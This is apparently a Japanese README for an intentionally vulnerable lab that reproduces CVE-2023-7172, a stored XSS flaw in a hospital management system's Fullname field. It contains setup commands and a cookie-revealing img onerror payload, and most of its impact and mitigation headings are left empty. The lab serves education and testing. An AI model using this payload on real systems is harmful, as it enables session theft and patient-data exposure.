格納型クロスサイトスクリプティング(XSS)は、悪意のあるコードをWebサイトに注入し、データベースに保存した後、他のユーザーが感染したページを閲覧した際に実行される深刻なWeb脆弱性です。この特定のケースでは、病院管理システム(HMS)のユーザーログインページに脆弱性が見つかっており、「Fullname」パラメータが格納型XSS攻撃の影響を受けやすくなっています。適切な入力検証とデータサニタイズ処理が欠如しているため、攻撃者は悪意のあるスクリプトを注入し、ユーザーアカウントを侵害したり、機密情報を窃取したり、不正な操作を実行したりする可能性があります。
git clone https://github.com/sharathc213/CVE-2023-7172.git
cd CVE-2023-7172
docker-compose up -d
http://localhost:8080/hms/registration.php にあるユーザー登録フォームに移動します。<img src="https://raw.githubusercontent.com/sharathc213/cve-2023-7173/HEAD/x" onerror=alert(document.cookie)>

http://localhost:8080/hms/user-login.php にあるログインページに移動します。
病院管理システムにおける格納型XSS脆弱性は、以下のような深刻な結果をもたらす可能性があります:
患者データの漏洩:
患者の安全上のリスク:
不正な操作:
信頼の低下:
規制違反:
医療サービスの中断:
法的・倫理的影響:
経済的影響:
この脆弱性に対処するには、以下の緩和策を実施してください:
このプロジェクトは意図的に脆弱性を含んでおり、教育およびテスト目的でのみ使用してください。本番環境にはデプロイしないでください。